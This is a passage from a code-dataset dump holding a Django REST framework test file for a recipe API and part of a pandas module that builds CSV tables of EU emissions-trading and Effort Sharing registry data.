"os.SEEK_SET", "line_number": 14, "usage_type": "attribute"}]}
+{"seq_id": "31153033949", "text": "\"\"\"\nTest Recipe API\n\"\"\"\nfrom decimal import Decimal\n\nfrom django.contrib.auth import 
get_user_model\nfrom django.test import TestCase\nfrom django.urls import reverse\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom core.models import Recipe\n\nfrom recipe.serializers import RecipeSerializer\n\nRECIPES_URL = reverse('recipe:recipe-list')\n\n\ndef create_recipe(user, **params):\n    \"\"\"Create and return recipe\"\"\"\n    defaults = {\n        \"title\": \"Sample recipe title\",\n        \"description\": \"Sample recipe description\",\n        \"time_minutes\": 22,\n        \"price\": Decimal(\"5.25\"),\n        \"link\": \"http://example.come/recipe.pdf\",\n    }\n    defaults.update(params)\n\n    recipe = Recipe.objects.create(user=user, **defaults)\n\n    return recipe\n\n\nclass PublicRecipeAPITests(TestCase):\n    \"\"\"Test unauthenticated API request.\"\"\"\n\n    def setUp(self):\n        self.client = APIClient()\n\n    def test_auth_required(self):\n        \"\"\"Test auth is required to call API\"\"\"\n        res = self.client.get(RECIPES_URL)\n\n        self.assertEquals(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateRecipeAPITest(TestCase):\n    \"\"\"Test for authenticated request\"\"\"\n\n    def setUp(self):\n        self.client = APIClient()\n        self.user = get_user_model().objects.create_user(\n            'user@mail.com',\n            'userpassword',\n        )\n        self.client.force_authenticate(self.user)\n\n    def test_retrive_recipes(self):\n        \"\"\"Test retrieving list of recipes.\"\"\"\n        create_recipe(user=self.user)\n        create_recipe(user=self.user)\n\n        res = self.client.get(RECIPES_URL)\n\n        recipes = Recipe.objects.all().order_by('-id')\n        serializer = RecipeSerializer(recipes, many=True)\n        self.assertEqual(res.status_code, status.HTTP_200_OK)\n        self.assertEqual(res.data, serializer.data)\n\n    def test_recipe_list_limited_to_user(self):\n        \"\"\"Test list of recipes is limited to authenticated user.\"\"\"\n        other_user = get_user_model().objects.create_user(\n            'other@mail.com',\n            'otherpassword'\n        )\n        create_recipe(user=other_user)\n        create_recipe(user=self.user)\n\n        res = self.client.get(RECIPES_URL)\n\n        recipes = Recipe.objects.filter(user=self.user)\n        serializer = RecipeSerializer(recipes, many=True)\n        self.assertEqual(res.status_code, status.HTTP_200_OK)\n        self.assertEqual(res.data, serializer.data)\n", "repo_name": "ancel-c-miller/recipe-app-api", "sub_path": "app/recipe/tests/test_recipe_api.py", "file_name": "test_recipe_api.py", "file_ext": "py", "file_size_in_byte": 2453, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.reverse", "line_number": 17, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 26, "usage_type": "call"}, {"api_name": "recipe.serializers", "line_number": 31, "usage_type": "name"}, {"api_name": "core.models.Recipe.objects.create", "line_number": 31, "usage_type": "call"}, {"api_name": "core.models.Recipe.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "core.models.Recipe", "line_number": 31, "usage_type": "name"}, {"api_name": "recipe.serializers", "line_number": 33, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 36, "usage_type": "name"}, {"api_name": "rest_framework.test.APIClient", "line_number": 40, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 46, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 46, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 49, "usage_type": "name"}, {"api_name": "rest_framework.test.APIClient", 
"line_number": 53, "usage_type": "call"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 54, "usage_type": "call"}, {"api_name": "core.models.Recipe.objects.all", "line_number": 67, "usage_type": "call"}, {"api_name": "core.models.Recipe.objects", "line_number": 67, "usage_type": "attribute"}, {"api_name": "core.models.Recipe", "line_number": 67, "usage_type": "name"}, {"api_name": "recipe.serializers.RecipeSerializer", "line_number": 68, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 69, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 69, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 74, "usage_type": "call"}, {"api_name": "core.models.Recipe.objects.filter", "line_number": 83, "usage_type": "call"}, {"api_name": "core.models.Recipe.objects", "line_number": 83, "usage_type": "attribute"}, {"api_name": "core.models.Recipe", "line_number": 83, "usage_type": "name"}, {"api_name": "recipe.serializers.RecipeSerializer", "line_number": 84, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 85, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 85, "usage_type": "name"}]} +{"seq_id": "10308019510", "text": "import pandas as pd\nimport numpy as np\nfrom datetime import datetime\nfrom .mappings import (\n map_registryCode_inv,\n map_account_type_inv,\n map_unitType_inv,\n map_registryCodes,\n export_mappings,\n)\nimport os\nimport glob\n\n\n# account information added by hand\nNEW_ACC = [\n {\n \"accountIDEutl\": 111264,\n \"name\": \"EU Credit Exchange Account - Aviation\",\n \"registry_id\": \"EU\",\n \"openingDate\": pd.to_datetime(\"2014-01-29\"),\n \"isOpen\": True,\n \"accountType_id\": \"100-23\",\n },\n {\n \"accountIDEutl\": 111265,\n \"name\": \"EU Credit Exchange Account - Aviation\",\n \"registry_id\": \"EU\",\n \"openingDate\": pd.to_datetime(\"2014-01-29\"),\n \"isOpen\": True,\n \"accountType_id\": \"100-23\",\n },\n {\n \"accountIDEutl\": 111267,\n \"name\": \"EU Credit Exchange Account\",\n \"registry_id\": \"EU\",\n \"openingDate\": pd.to_datetime(\"2014-01-29\"),\n \"isOpen\": True,\n \"accountType_id\": \"100-23\",\n },\n {\n \"accountIDEutl\": 111266,\n \"name\": \"EU Credit Exchange Account\",\n \"registry_id\": \"EU\",\n \"openingDate\": pd.to_datetime(\"2014-01-29\"),\n \"isOpen\": True,\n \"accountType_id\": \"100-23\",\n },\n]\n\n\ndef create_csv_tables(\n dir_in, dir_out, fn_coordinates=None, fn_nace=None, fn_nace_codes=None\n):\n \"\"\"Create all tables\n :param dir_in: directory with parsed data\n :param dir_out: output directory\n :param fn_coordinates: path to file with installation coordinates\n :param fn_nace: name of file with nace codes for installations\n if None, NACE codes are not processed\n :param fn_nace_codes: name of file with nace classification scheme\n If None, classification lookup not exported\n \"\"\"\n print(\"####### Create lookup tables\")\n create_tables_lookup(dir_in, dir_out, fn_nace_codes=fn_nace_codes)\n\n print(\"####### Create installation tables\")\n create_table_installation(\n dir_in, dir_out, fn_coordinates=fn_coordinates, fn_nace=fn_nace\n )\n create_table_compliance(dir_in, dir_out)\n create_table_surrender(dir_in, dir_out)\n\n print(\"####### Create account tables\")\n create_table_accountHolder(dir_in, dir_out)\n create_table_account(dir_in, dir_out)\n\n print(\"####### Create transcation tables\")\n create_table_transaction(dir_in, 
dir_out)\n\n print(\"####### Add ESD information\")\n create_esd_tables(dir_in, dir_out, save_data=True)\n\n\ndef create_esd_tables(dir_in, dir_out, save_data=True):\n \"\"\"Adds esd information to existing tables and creates esd\n compliance table\n :param dir_in: directory with parsed esd data as provided by spider\n :param dir_out: directory with final csv files\n :param save_data: save data to csv\n \"\"\"\n # -----------------------------------------------------------\n # load data\n fn_trans = dir_in + \"esdTransactions.csv\"\n fn_trans_blocks = dir_in + \"esdTransactionBlocks.csv\"\n fn_compliance = dir_in + \"esdCompliance.csv\"\n\n df_t = pd.read_csv(fn_trans, parse_dates=[\"transactionDate\"])\n df_tb = pd.read_csv(fn_trans_blocks, parse_dates=[\"transactionDate\"])\n df_c = pd.read_csv(fn_compliance)\n df_acc_euets = pd.read_csv(dir_out + \"accounts.csv\", low_memory=False)\n df_acc_holder_euets = pd.read_csv(dir_out + \"accountHolders.csv\")\n df_projects_euets = pd.read_csv(dir_out + \"offset_projects.csv\")\n df_trans_euets = pd.read_csv(dir_out + \"transactionBlocks.csv\")\n df_comp_euets = pd.read_csv(dir_out + \"compliance.csv\", low_memory=False)\n df_surr_euets = pd.read_csv(dir_out + \"surrender.csv\")\n df_inst_euets = pd.read_csv(dir_out + \"installations.csv\", dtype={\"nace_id\": \"str\"})\n\n # determine maximum account ids etc for id management\n # TODO move that to database creation and let postgres figure out ids?\n max_holder_id = df_acc_holder_euets[\"id\"].max()\n max_acc_id = df_acc_euets[\"accountIDEutl\"].max()\n max_trans_id = df_trans_euets[\"id\"].max()\n map_unitType = (\n pd.read_csv(dir_out + \"unitTypeCodes.csv\")\n .set_index(\"description\")[\"id\"]\n .to_dict()\n )\n map_unitType.update({\"Annual Emission Allocation Unit\": \"AEA\"})\n # -----------------------------------------------------------\n # create account table\n # the ESD does not directly report accounts. In fact, each member state has\n # one account for each year of compliance. 
In addition, there are accounts to\n    # manage the ESD.\n    # To stay consistent with the general data model, we create ESD accounts\n    # based on (a) ESD compliance tables and (b) ESD transactions\n    # (a) get accounts from compliance table\n    df_acc = df_c[\n        [\"accountIdentifier\", \"accountStatus\", \"memberState\"]\n    ].drop_duplicates()\n    df_ = df_c.accountIdentifier.str.split(\"-\", expand=True)\n    df_acc[\"tradingSystem\"] = df_[0]\n    df_acc[\"yearValid\"] = df_[2].astype(\"int\")\n\n    # (b) accounts from transaction table\n    accs = list(df_acc.accountIdentifier.unique())\n    df_t_acc = pd.concat(\n        [\n            (\n                df_t.query(f\"transferringAccountIdentifier not in {accs}\")[\n                    [\"transferringAccountIdentifier\", \"transferringMemberState\"]\n                ].rename(\n                    columns={\n                        \"transferringAccountIdentifier\": \"accountIdentifier\",\n                        \"transferringMemberState\": \"memberState\",\n                    }\n                )\n            ),\n            (\n                df_t.query(f\"acquiringAccountIdentifier not in {accs}\")[\n                    [\"acquiringAccountIdentifier\", \"acquiringMemberState\"]\n                ].rename(\n                    columns={\n                        \"acquiringAccountIdentifier\": \"accountIdentifier\",\n                        \"acquiringMemberState\": \"memberState\",\n                    }\n                )\n            ),\n        ]\n    ).drop_duplicates()\n\n    def extract_ets_system(x):\n        if x.split(\"-\")[0].startswith(\"ESD\"):\n            return \"ESD\"\n        return np.nan\n\n    df_t_acc[\"tradingSystem\"] = df_t_acc.accountIdentifier.map(extract_ets_system)\n    # for accounts not in the ESD, try to find an already existing account in the EUETS\n    search_in_euets = df_t_acc[\n        pd.isnull(df_t_acc.tradingSystem)\n    ].accountIdentifier.to_list()\n    map_euets_account = (\n        df_acc_euets[\n            (df_acc_euets.name.notnull()) & (df_acc_euets.name.isin(search_in_euets))\n        ]\n        .set_index(\"name\")[\"accountIDEutl\"]\n        .to_dict()\n    )\n    df_t_acc = df_t_acc[~df_t_acc.accountIdentifier.isin(search_in_euets)]\n    df_t_acc.memberState = \"EU\"\n\n    df_acc = pd.concat([df_acc, df_t_acc]).rename(\n        columns={\"accountIdentifier\": \"accountID\"}\n    )\n\n    # -----------------------------------------------------------\n    # create account holder table\n    # for accounts with member state, use the member state\n    # else use the account name as account holder name\n    df_acc_holder = df_acc[df_acc.memberState.notnull()][\n        \"memberState\"\n    ].drop_duplicates()\n    df_ = df_acc[df_acc.memberState.isnull()][\"accountID\"].drop_duplicates()\n    df_acc_holder = pd.concat([df_acc_holder, df_]).to_frame(\"name\")\n    df_acc_holder[\"id\"] = list(\n        max_holder_id + i for i in range(1, len(df_acc_holder) + 1)\n    )\n\n    # establish foreign key in account table\n    map_acc_holder = dict(zip(df_acc_holder.name, df_acc_holder.id))\n    df_acc[\"accountHolder_id\"] = df_acc.memberState.map(lambda x: map_acc_holder.get(x))\n    df_acc.loc[df_acc.accountHolder_id.isnull(), \"accountHolder_id\"] = df_acc.loc[\n        df_acc.accountHolder_id.isnull(), \"accountID\"\n    ].map(lambda x: map_acc_holder.get(x))\n    df_acc.accountHolder_id = df_acc.accountHolder_id.astype(\"int\")\n\n    # create primary key for account table\n    df_acc[\"accountIDEutl\"] = list(max_acc_id + i for i in range(1, len(df_acc) + 1))\n\n    # rename to be consistent with existing table\n    df_acc = df_acc.rename(\n        columns={\n            \"accountIDEutl\": \"accountIDEutl\",\n            \"accountID\": \"accountIDESD\",\n            \"accountStatus\": \"isOpen\",\n            \"memberState\": \"registry_id\",\n            \"tradingSystem\": \"tradingSystem\",\n            \"yearValid\": \"yearValid\",\n            \"accountHolder_id\": \"accountHolder_id\",\n        }\n    )\n    df_acc.isOpen = ~(df_acc.isOpen == \"closed\")\n    mask = df_acc.accountIDESD.str.startswith(\"ESD\") & df_acc.registry_id.isnull()\n    
df_acc.loc[mask, \"registry_id\"] = \"ESD\"\n    df_acc[\"tradingSystem\"] = \"esd\"\n    df_acc_holder[\"tradingSystem\"] = \"esd\"\n    df_acc_holder[\"name\"] = \"Effort Sharing: \" + df_acc_holder[\"name\"].map(\n        map_registryCodes\n    )\n    # we do not have an account name in the ESD, thus we create one equal to the\n    # account identifier; we also add an account type\n    df_acc[\"name\"] = df_acc.accountIDESD\n    df_acc[\"accountType_id\"] = \"esd\"\n\n    # -----------------------------------------------------------\n    # compliance data\n    df_c[\"surrendered\"] = df_c.surrenderedAea + df_c.surrenderedCredits\n    df_c = df_c.merge(\n        df_acc[[\"accountIDEutl\", \"accountIDESD\"]],\n        left_on=\"accountIdentifier\",\n        right_on=\"accountIDESD\",\n        how=\"left\",\n    )\n    df_comp = df_c.rename(\n        columns={\n            \"accountIDEutl\": \"account_id\",\n            \"compliance\": \"compliance_id\",\n            \"memberState\": \"registry_id\",\n            \"allocated\": \"allocatedTotal\",\n        }\n    )\n    df_comp[\"surrendered\"] = df_comp.surrenderedAea + df_comp.surrenderedCredits\n\n    # FIT ESD into standard data model creating installations for each country\n    # - create some installations that represent countries under the ESD. We\n    #   used f\"{country_id}_ESD\" as installation id\n    # - add this id to the compliance table\n    # - establish the link between accounts and installations\n    # - create table with surrendering details\n    df_comp[\"installation_id\"] = df_comp.registry_id.map(lambda x: f\"{x}_esd\")\n    df_inst = pd.DataFrame({\"id\": df_comp[\"installation_id\"].unique()})\n    df_inst[[\"registry_id\", \"tradingSystem\"]] = df_inst.id.str.split(\"_\", expand=True)\n    df_inst[\"activity_id\"] = 1000\n    df_inst[\"name\"] = \"Effort Sharing Installation: \" + df_inst.registry_id.map(\n        map_registryCodes\n    )\n    df_acc[\"installation_id\"] = df_acc.registry_id.map(\n        df_inst.set_index(\"registry_id\")[\"id\"].to_dict()\n    )\n    df_surr = pd.concat(\n        [\n            df_comp[[\"installation_id\", \"year\", \"surrenderedAea\"]]\n            .assign(unitType_id=\"AEA\")\n            .rename(columns={\"surrenderedAea\": \"amount\"}),\n            df_comp[[\"installation_id\", \"year\", \"surrenderedCredits\"]]\n            .assign(unitType_id=\"credit\")\n            .rename(columns={\"surrenderedCredits\": \"amount\"}),\n        ]\n    ).assign(reportedInSystem=\"esd\")\n    df_comp = df_comp.drop(\n        [\n            \"accountIdentifier\",\n            \"accountStatus\",\n            \"account_id\",\n            \"accountIDESD\",\n            \"surrenderedAea\",\n            \"surrenderedCredits\",\n            \"registry_id\",\n        ],\n        axis=1,\n    ).assign(reportedInSystem=\"esd\")\n    # -----------------------------------------------------------\n    # transaction data\n    # check if transaction table has additional projects not already represented\n    # in the existing project table. 
If so, add them\n    projects_ids = [p for p in df_tb.projectID.unique() if pd.notnull(p)]\n    projects_ids_eutl = [p for p in df_projects_euets[\"id\"].unique() if pd.notnull(p)]\n    to_add = np.setdiff1d(projects_ids, projects_ids_eutl)\n    if len(to_add) > 0:\n        cols = [\"projectID\", \"projectTrack\", \"originatingRegistry\"]\n        df_projects = (\n            df_tb[df_tb.projectID.isin(to_add)][cols]\n            .drop_duplicates()\n            .rename(\n                {\n                    \"projectID\": \"id\",\n                    \"projectTrack\": \"track\",\n                    \"originatingRegistry\": \"country_id\",\n                }\n            )\n        )\n        df_projects[\"source\"] = \"esdTransactions\"\n        df_projects_euets = pd.concat([df_projects_euets, df_projects])\n\n    # remove information from transaction blocks and aggregate them\n    # by enumerating transaction blocks\n    cols = [\n        \"expiryDate\",\n        \"projectTrack\",\n        \"lulucfActivity\",\n        \"acquiringAccountId\",\n        \"acquiringAccountIdentifier\",\n        \"transferringAccountId\",\n        \"transferringAccountIdentifier\",\n        \"transactionDate\",\n        \"transactionType\",\n        \"transactionURL\",\n    ]\n    cols = [\n        \"transactionID\",\n        \"projectID\",\n        \"originatingRegistry\",\n        \"originalCommitmentPeriod\",\n        \"unitType\",\n    ]\n    df_tb = (\n        df_tb.groupby(cols, as_index=False, dropna=False)\n        .amount.sum()\n        .sort_values(\"transactionID\")\n    )\n    df_tb[\"transactionBlock\"] = df_tb.groupby(\"transactionID\").cumcount() + 1\n\n    # check that we have the same amount in transactions and blocks\n    df_check = (\n        (df_tb.groupby(\"transactionID\").amount.sum() * (-1))\n        .reset_index()\n        .merge(\n            df_t.groupby(\"transactionID\", as_index=False).amount.sum(),\n            on=\"transactionID\",\n        )\n        .set_index(\"transactionID\")\n    )\n    assert (df_check.sum(1).sum()) == 0, \"Missing transaction blocks\"\n    # merge main transaction information with blocks\n    df_trans = df_t.drop(\n        [\"amount\", \"acquiringMemberState\", \"transferringMemberState\"], axis=1\n    ).merge(df_tb, on=\"transactionID\", how=\"right\")\n    # get correct account ids\n    map_acc = dict(zip(df_acc.accountIDESD, df_acc.accountIDEutl))\n    map_acc.update(map_euets_account)\n    df_trans[\"acquiringAccount_id\"] = df_trans.acquiringAccountIdentifier.map(map_acc)\n    df_trans[\"transferringAccount_id\"] = df_trans.transferringAccountIdentifier.map(\n        map_acc\n    )\n    df_trans[\"transactionTypeMain_id\"] = df_trans[\"transactionType\"].map(\n        lambda x: int(x.split(\"-\")[0])\n    )\n    df_trans[\"transactionTypeSupplementary_id\"] = df_trans[\"transactionType\"].map(\n        lambda x: int(x.split(\"-\")[-1])\n    )\n    col_rename = {\n        \"transactionID\": \"transactionID\",\n        \"transactionBlock\": \"transactionBlock\",\n        \"transactionDate\": \"date\",\n        \"acquiringYear\": \"acquiringYear\",\n        \"transferringYear\": \"transferringYear\",\n        \"transactionTypeMain_id\": \"transactionTypeMain_id\",\n        \"transactionTypeSupplementary_id\": \"transactionTypeSupplementary_id\",\n        \"unitType\": \"unitType_id\",\n        \"projectID\": \"project_id\",\n        \"acquiringAccount_id\": \"acquiringAccount_id\",\n        \"transferringAccount_id\": \"transferringAccount_id\",\n        \"amount\": \"amount\",\n    }\n    df_trans = df_trans[list(col_rename.keys())].rename(columns=col_rename)\n    df_trans[\"tradingSystem\"] = \"esd\"\n    df_trans[\"id\"] = list(max_trans_id + i for i in range(1, len(df_trans) + 1))\n    df_trans[\"unitType_id\"] = df_trans.unitType_id.map(lambda x: map_unitType.get(x))\n\n    # -----------------------------------------------------------\n    # save outputs\n    # append tables to existing ones and save\n    df_acc = pd.concat([df_acc_euets, df_acc])\n    df_acc_holder = pd.concat([df_acc_holder_euets, df_acc_holder])\n    
df_trans = pd.concat([df_trans_euets, df_trans])\n df_comp = pd.concat([df_comp_euets, df_comp])\n df_surr = pd.concat([df_surr_euets, df_surr])\n df_inst = pd.concat([df_inst_euets, df_inst])\n if save_data:\n df_acc.to_csv(dir_out + \"accounts.csv\", index=False)\n df_acc_holder.to_csv(dir_out + \"accountHolders.csv\", index=False)\n df_comp.to_csv(dir_out + \"compliance.csv\", index=False)\n df_surr.to_csv(dir_out + \"surrender.csv\", index=False)\n df_projects_euets.to_csv(dir_out + \"offset_projects.csv\", index=False)\n df_trans.to_csv(dir_out + \"transactionBlocks.csv\", index=False)\n df_inst.to_csv(dir_out + \"installations.csv\", index=False)\n return\n\n\ndef create_table_installation(dir_in, dir_out, fn_coordinates=None, fn_nace=None):\n \"\"\"Create installation table\n :param dir_in: directory with parsed data\n :param dir_out: output directory\n :param fn_coordinates: name of file with coordinates\n :param fn_nace: name of file with nace codes\n if None, NACE codes are not processed\n \"\"\"\n # get data: installation data together with addresses with updated coordinates\n # and entitlements\n df_inst = pd.read_csv(\n dir_in + \"installations.csv\",\n )\n df_enti = pd.read_csv(\n dir_in + \"entitlements.csv\", na_values=[\"Not Applicable\", \"Not Set\"]\n )\n df_enti[\"installationID_new\"] = df_enti.registry.map(\n lambda x: map_registryCode_inv.get(x)\n )\n df_enti[\"installationID\"] = (\n df_enti[\"installationID_new\"] + \"_\" + df_enti[\"installationID\"].map(str)\n )\n df_enti = df_enti[[\"installationID\", \"euEntitlement\", \"chEntitlement\"]].copy()\n df_inst = df_inst.merge(df_enti, on=\"installationID\", how=\"left\")\n\n # add the trading system information\n df_inst[\"tradingSystem\"] = \"euets\"\n\n # transform dataframe to be consistent with Installation object\n cols_inst = {\n \"installationID\": \"id\",\n \"name\": \"name\",\n \"tradingSystem\": \"tradingSystem\",\n \"registryCode\": \"registry_id\",\n \"activity\": \"activity_id\",\n \"eprtrID\": \"eprtrID\",\n \"parent\": \"parentCompany\",\n \"subsidiary\": \"subsidiaryCompany\",\n \"permitID\": \"permitID\",\n \"icaoID\": \"designatorICAO\",\n \"monitoringPlanId\": \"monitoringID\",\n \"monitoringPlanExpiry\": \"monitoringExpiry\",\n \"monitoringPlanFirstYear\": \"monitoringFirstYear\",\n \"permitExpiry\": \"permitDateExpiry\",\n \"isAircraftOperator\": \"isAircraftOperator\",\n \"ec7482009ID\": \"ec748_2009Code\",\n \"permitEntryDate\": \"permitDateEntry\",\n \"mainAddress\": \"mainAddress\",\n \"secondaryAddress\": \"secondaryAddress\",\n \"postalCode\": \"postalCode\",\n \"city\": \"city\",\n \"country\": \"country_id\",\n \"latitude\": \"latitudeEutl\",\n \"longitude\": \"longitudeEutl\",\n \"euEntitlement\": \"euEntitlement\",\n \"chEntitlement\": \"chEntitlement\",\n }\n df_inst_to_tbl = df_inst[\n [c for c in cols_inst.keys() if c in df_inst.columns]\n ].copy()\n df_inst_to_tbl = df_inst_to_tbl.rename(columns=cols_inst)\n # convert activity id to id only (without description)\n df_inst_to_tbl.activity_id = df_inst_to_tbl.activity_id.map(\n lambda x: int(x.split(\"-\")[0])\n )\n\n if fn_coordinates is not None:\n df_ = pd.read_csv(\n fn_coordinates,\n names=[\"id\", \"latitudeGoogle\", \"longitudeGoogle\"],\n usecols=[\"id\", \"latitudeGoogle\", \"longitudeGoogle\"],\n header=0,\n )\n df_inst_to_tbl = df_inst_to_tbl.merge(df_, on=\"id\", how=\"left\")\n\n # add nace codes\n if fn_nace:\n # primarily use 2020 leakage list but fill with 15\n df_ = pd.read_csv(\n fn_nace,\n usecols=[\"id\", 
\"nace15\", \"nace20\"],\n dtype={\"nace15\": \"str\", \"nace20\": \"str\"},\n ).drop_duplicates()\n df_[\"nace_id\"] = df_.nace20.fillna(df_.nace15)\n df_ = df_.rename(columns={\"nace15\": \"nace15_id\", \"nace20\": \"nace20_id\"})\n df_inst_to_tbl = df_inst_to_tbl.merge(df_, on=\"id\", how=\"left\")\n # for aircraft add the nace code 51 (Air transport)\n df_inst_to_tbl.loc[\n df_inst_to_tbl.isAircraftOperator, \"nace_id\"\n ] = df_inst_to_tbl.loc[df_inst_to_tbl.isAircraftOperator, \"nace_id\"].fillna(51)\n\n # add created timestamp\n df_inst_to_tbl[\"created_on\"] = datetime.now()\n df_inst_to_tbl[\"updated_on\"] = datetime.now()\n\n # if installation does not provide a name, create one\n # since these are mostly aircraft operators we use the ec748 code and fall\n # back to the installation id\n df_inst_to_tbl.name = df_inst_to_tbl.name.fillna(\n df_inst_to_tbl.ec748_2009Code\n ).fillna(df_inst_to_tbl.id)\n # export to csv\n df_inst_to_tbl.to_csv(dir_out + \"installations.csv\", index=False, encoding=\"utf-8\")\n\n return\n\n\ndef create_table_compliance(dir_in, dir_out):\n \"\"\"Create table with compliance data\n :param dir_in: directory with parsed data\n :param dir_out: output directory\n \"\"\"\n # get data\n df_comp = pd.read_csv(dir_in + \"compliance.csv\")\n\n # transform dataframe to be consistent with Installation object\n cols_comp = {\n \"installationID\": \"installation_id\",\n \"year\": \"year\",\n \"phase\": \"euetsPhase\",\n \"complianceCode\": \"compliance_id\",\n \"allocationFree\": \"allocatedFree\",\n \"allocationNewEntrance\": \"allocatedNewEntrance\",\n \"allocationTotal\": \"allocatedTotal\",\n \"allocation10c\": \"allocated10c\",\n \"verified\": \"verified\",\n \"verifiedCumulative\": \"verifiedCummulative\",\n \"complianceCodeUpdated\": \"verifiedUpdated\",\n \"surrendered\": \"surrendered\",\n \"surrenderedCumulative\": \"surrenderedCummulative\",\n \"reportedInSystem\": \"reportedInSystem\",\n }\n\n # calculate total allocation\n df_comp[\"allocationTotal\"] = (\n df_comp[\"allocationNewEntrance\"].fillna(0)\n + df_comp[\"allocationFree\"].fillna(0)\n + df_comp[\"allocation10c\"].fillna(0)\n )\n df_comp_to_tbl = df_comp[cols_comp.keys()].copy()\n df_comp_to_tbl = df_comp_to_tbl.rename(columns=cols_comp)\n # verified emission might have status \"Excluded\" which we set to missing (to have an int column)\n df_comp_to_tbl.verified = df_comp_to_tbl.verified.replace(\n [\"Excluded\", \"Not Reported\"], np.nan\n )\n df_comp_to_tbl.verifiedCummulative = df_comp_to_tbl.verifiedCummulative.replace(\n \"Not Calculated\", np.nan\n )\n # add created timestamp\n df_comp_to_tbl[\"created_on\"] = datetime.now()\n df_comp_to_tbl[\"updated_on\"] = datetime.now()\n\n # save table\n df_comp_to_tbl.to_csv(dir_out + \"compliance.csv\", index=False, encoding=\"utf-8\")\n\n return\n\n\ndef create_table_surrender(dir_in, dir_out):\n \"\"\"Create table with surrendering details as well as offset projects\n :param dir_in: directory with parsed data\n :param dir_out: output directory\n \"\"\"\n # get data\n df_surr = pd.read_csv(dir_in + \"surrendering.csv\")\n\n # create offset project table\n df_proj = (\n df_surr[[\"projectID\", \"track\", \"originatingRegistry\"]]\n .dropna(subset=[\"projectID\"])\n .drop_duplicates()\n )\n df_proj.columns = [\"id\", \"track\", \"country_id\"]\n # convert country names to country ids\n df_proj.country_id = df_proj.country_id.map(map_registryCode_inv)\n df_proj[\"created_on\"] = datetime.now()\n df_proj[\"updated_on\"] = datetime.now()\n\n # ensure 
consistency of reportedInSystem with lookup tables\n    df_surr.reportedInSystem = df_surr.reportedInSystem.str.lower()\n\n    # choose and rename columns in the surrendering table and insert them into the database\n    cols_surr = {\n        \"installationID\": \"installation_id\",\n        \"year\": \"year\",\n        \"unitType\": \"unitType_id\",\n        \"amount\": \"amount\",\n        \"originatingRegistry\": \"originatingRegistry_id\",\n        # 'accountID': 'account_id',\n        \"projectID\": \"project_id\",\n        # 'expiryDate': 'expiryDate',\n        \"reportedInSystem\": \"reportedInSystem\",\n    }\n\n    df_surr_to_tbl = df_surr[cols_surr.keys()].copy()\n    df_surr_to_tbl = df_surr_to_tbl.rename(columns=cols_surr)\n    # impose lookup codes\n    df_surr_to_tbl.unitType_id = df_surr_to_tbl.unitType_id.map(map_unitType_inv)\n    df_surr_to_tbl.originatingRegistry_id = df_surr_to_tbl.originatingRegistry_id.map(\n        map_registryCode_inv\n    )\n\n    # need to add a primary key for surrendering rows\n    # here we simply use the index\n    df_surr_to_tbl[\"id\"] = df_surr_to_tbl.index\n\n    # add created timestamp\n    df_surr_to_tbl[\"created_on\"] = datetime.now()\n    df_surr_to_tbl[\"updated_on\"] = datetime.now()\n\n    # save data\n    df_surr_to_tbl.to_csv(dir_out + \"surrender.csv\", index=False, encoding=\"utf-8\")\n    df_proj.to_csv(dir_out + \"offset_projects.csv\", index=False, encoding=\"utf-8\")\n\n\ndef create_table_accountHolder(dir_in, dir_out):\n    \"\"\"Create account holder table dropping duplicated account holders\n    :param dir_in: directory with parsed data\n    :param dir_out: output directory\n    \"\"\"\n    df = pd.read_csv(dir_in + \"/contacts.csv\", na_values=[\"-\", \"na\", \".\", \"0\", \"XXX\"])\n\n    # Create a unique account holder ID that identifies duplicates\n    def get_duplicate_matching(df, cols_duplication, col_id):\n        \"\"\"Mapping of duplicated rows to ID of first occurrence of the duplicated row\n        :param df: with data\n        :param cols_duplication: name of columns checked for duplicates\n        :param col_id: name of column with identifier\n        :return: mapping to id of first occurrence row\n        \"\"\"\n        df_d = df[df.duplicated(subset=cols_duplication, keep=False)].drop_duplicates(\n            cols_duplication\n        )\n        df_d[\"__newID__\"] = df_d[col_id]\n        df_f = df.merge(df_d, on=cols_duplication, suffixes=(\"\", \"_y\"))\n        df_f = df_f[df_f[\"__newID__\"].notnull()].copy()\n        m = pd.Series(df_f[\"__newID__\"].values, index=df_f[col_id])  # .to_dict()\n        return m\n\n    # require a minimum of information to identify duplicates\n    cols_nonNull = [\"name\", \"mainAddress\", \"city\", \"country\"]\n    df_ = df[df[cols_nonNull].notnull().all(axis=1)]\n\n    # get duplicates by all columns (except associated accountID)\n    cols_duplication = [c for c in df.columns if c not in [\"accountID\", \"accountURL\"]]\n    match_all = get_duplicate_matching(df_, cols_duplication, col_id=\"accountID\")\n\n    # insert map on accountHolderID into original frame\n    # if not duplicate simply assign the original account ID\n    df[\"accountHolderID\"] = df.accountID.map(lambda x: match_all.get(x, x))\n\n    # get a mapping from account holder to accountID\n    df_map_accountHolders = df[[\"accountHolderID\", \"accountID\"]].copy()\n\n    # drop duplicates and map country column to codes\n    df = df.drop_duplicates(\"accountHolderID\")\n\n    # create country lookups instead of full country names\n    df.country = df.country.map(map_registryCode_inv)\n\n    # rename columns\n    cols_accountHolder = {\n        \"accountHolderID\": \"id\",\n        \"name\": \"name\",\n        \"mainAddress\": \"addressMain\",\n        \"secondaryAddress\": \"addressSecondary\",\n        \"postalCode\": \"postalCode\",\n        
